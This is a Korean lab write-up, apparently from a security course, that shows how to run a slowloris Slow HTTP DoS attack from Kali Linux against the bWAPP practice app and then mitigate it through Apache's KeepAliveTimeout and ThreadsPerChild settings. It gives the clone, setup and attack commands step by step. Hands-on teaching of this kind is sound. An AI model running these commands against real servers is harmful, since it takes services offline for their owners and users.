삽질블로그
[Kali_LINUX] Denial-of-service ( Slow HTTP DoS ) | bWAPP | Security Misconfiguration 본문
[Kali_LINUX] Denial-of-service ( Slow HTTP DoS ) | bWAPP | Security Misconfiguration
삽질장인 2020. 9. 1. 15:20본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
1. Security Misconfiguration
- 잘못된 보안 구성
- 서버 / 시스템 / DB / 네트워크 장비 / 웹 설정 오류로 인하여 발생하는 취약점이다.
- Ex) 디렉토링 리스팅, 에러페이지, 웹페이지 주석, 웹서버 기본 설정, Adobe Flash 취약점, Dos/DDos공격,
특정 서비스에 대한 Reverse_TCP 공격, 로컬 권한 취약점, 백업 / 임시 / robots 파일
2. Dos/DDos 공격
- 대량 패킷들을 전송하여 시스템 / 서버 / 네트워크 리소스를 고갈시켜 부하 발생, 요청 방해 및 연결 거부를 발생하는 공격이다.
- 단, 정보 유출에 대한 취약점은 없지만, 서비스가 마비되기 때문에 사용자 및 기업 입장에서 시간 / 비용 손실을 발생시킨다.
3. Slow HTTP Dos
- 메세지 헤더의 마지막을 알리는 'empty line'을 포함시키지 않고 HTTP 요청을 조금씩 / 천천히 전송하여 웹-서버 대기현상을 발생시키는 공격이다. ( CRLF : Carriage Return and Line Feed )
- HTTP 헤더에 케리지리턴(/n/r)을 보내지 않음으로써 서버에게 더 보낼 데이터가 있는거 처럼 만들어서 연결 상태를 유지하는 공격이다. 이렇게 되면 서버에서 TCP 세션 개수가 계속 늘어나기 때문에 다른 연결을 실시할 수 없게 된다.
- 즉, 웹서버가 수신한 HTTP 헤더의 CRLF (0d 0a)가 두번 들어간 정보를 보고 Body 부분을 인식하는데, 이것을 한번만 인식하게 되면 'Body'내용이 아직 도착을 안한 것으로 인식하여 대기하게 된다.
4. Security Misconfiguration - Denial-of-Service ( Slow HTTP Dos )
- 이 시나리오는 'slowloris' 툴을 이용하여 Slow HTTP DoS 공격을 진행할 예정이다.
=========================================================================
1) 첫화면
2) 명령창 열고 slowloris 다운로드
root@kali:~# git clone https://github.com/Ogglas/Orignal-Slowloris-HTTP-DoS.git
3)
3-1) # cd Original-Slowloris-HTTP-DoS
3-2) ls - l로 파일 권한 확인
3-3) 권한부여
#chmod a+x alowloris.pl
3-4) 권한확인
4) 파일실행
root@kali:/Original-Slowloris-HTTP-Dos# ./slowloris.pl
5) bWAPP 도메인 설정 실시
# vi /etc/hosts
127.0.1.1 kali 밑에
192.168.222.132 www.bwapphttpslow.com
6) 와이어샤크 실행 및 캡쳐 실시
# wireshark &
Capture > Start
7) Slow HTTP DoS 공격 실시
root@kali:/Original-Slowloris-HTTP-Dos# ./slowloris.pl -dns www.bwapphttpslow.com
나올때는 Ctrl + C
8) 와이어샤크 캡처 내용 확인
9) bWAPP TCP 연결 상태 확인
10) Security Misconfiguration - Denial-of-Service ( Slow HTTP DoS ) 해결 방안
- 'ThreadsPerChild', 'KeepAliveTimeout 15' 값을 변경
bee@bee-box:~$ cd /etc/apache2
bee@bee-box:/etc/apache2$ gedit apache2.conf
- 중간 생략 -
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 15
# worker MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves
<IfModule mpm_worker_module>
StartServers 2
MaxClients 150
MinSpareThreads 25
MaxSpareThreads 75
ThreadsPerChild 25
MaxRequestsPerChild 0
</IfModule>